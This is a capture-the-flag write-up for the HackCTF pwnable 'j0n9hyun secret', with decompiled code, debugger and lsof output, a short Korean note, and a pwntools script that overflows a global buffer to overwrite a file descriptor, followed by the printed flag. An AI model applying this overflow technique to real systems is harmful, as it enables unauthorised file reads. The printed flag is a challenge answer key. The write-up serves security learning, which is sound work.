[HackCTF / pwnable] j0n9hyun secret

HackCTF - j0n9hyun secret

Summary

• buffer overflow

Analysis

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 v3; // r8
  __int64 v4; // r8
  __int64 v5; // r8
  int v6; // ST0C_4
​
  sub_40FDD0((unsigned int *)off_6CA748, 0LL, 2LL, 0LL, v3);
  sub_40FDD0((unsigned int *)off_6CA740, 0LL, 2LL, 0LL, v4);
  sub_40FDD0((unsigned int *)off_6CA738, 0LL, 2LL, 0LL, v5);
  f = fopen("top_secret", (char *)'r');
  printf("input name: ", 'r');
  scanf("%s", &name);
  v6 = read(f, &buffer, 0x12CuLL);
  write(1, &buffer, v6);
  return 0;
}

__int32 fopen_flag()
{
  return fopen("flag", (char *)0x72);
}

gdb-peda$ info proc
process 2499
cmdline = '/home/cg10036/CTF/hackCTF/j0n9hyun_secret/j0n9hyun_secret'
cwd = '/home/cg10036/CTF/hackCTF/j0n9hyun_secret'
exe = '/home/cg10036/CTF/hackCTF/j0n9hyun_secret/j0n9hyun_secret'
gdb-peda$ shell lsof -p 2499
lsof: WARNING: can't stat() fuse.gvfsd-fuse file system /run/user/108/gvfs
      Output information may be incomplete.
COMMAND    PID    USER   FD   TYPE DEVICE SIZE/OFF    NODE NAME
j0n9hyun_ 2499 cg10036  cwd    DIR    8,1     4096 2097160 /home/cg10036/CTF/hackCTF/j0n9hyun_secret
j0n9hyun_ 2499 cg10036  rtd    DIR    8,1     4096       2 /
j0n9hyun_ 2499 cg10036  txt    REG    8,1   840640 2099803 /home/cg10036/CTF/hackCTF/j0n9hyun_secret/j0n9hyun_secret
j0n9hyun_ 2499 cg10036    0u   CHR  136,0      0t0       3 /dev/pts/0
j0n9hyun_ 2499 cg10036    1u   CHR  136,0      0t0       3 /dev/pts/0
j0n9hyun_ 2499 cg10036    2u   CHR  136,0      0t0       3 /dev/pts/0
j0n9hyun_ 2499 cg10036    3u   REG    8,1       15 2100969 /home/cg10036/CTF/hackCTF/j0n9hyun_secret/flag
j0n9hyun_ 2499 cg10036    4u   REG    8,1       23 2100989 /home/cg10036/CTF/hackCTF/j0n9hyun_secret/top_secret

name을 입력할때 f를 덮어 씌워서 3으로 만들면 flag가 읽힌다.

Exploit

from pwn import *
​
e = ELF("./j0n9hyun_secret")
#p = process("./j0n9hyun_secret")
p = remote("ctf.j0n9hyun.xyz", 3031)
​
p.recvuntil("input name: ")
​
payload = ""
payload += "A"*(0x6CCE98-0x6CCD60)
payload += p32(0x3)
​
p.sendline(payload)
p.interactive()

Flag

cg10036@cg10036-virtual-machine:~/CTF/hackCTF/j0n9hyun_secret$ p ex.py 
[*] '/home/cg10036/CTF/hackCTF/j0n9hyun_secret/j0n9hyun_secret'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to ctf.j0n9hyun.xyz on port 3031: Done
[*] Switching to interactive mode
HackCTF{ez_fd_0v4rwr1t4}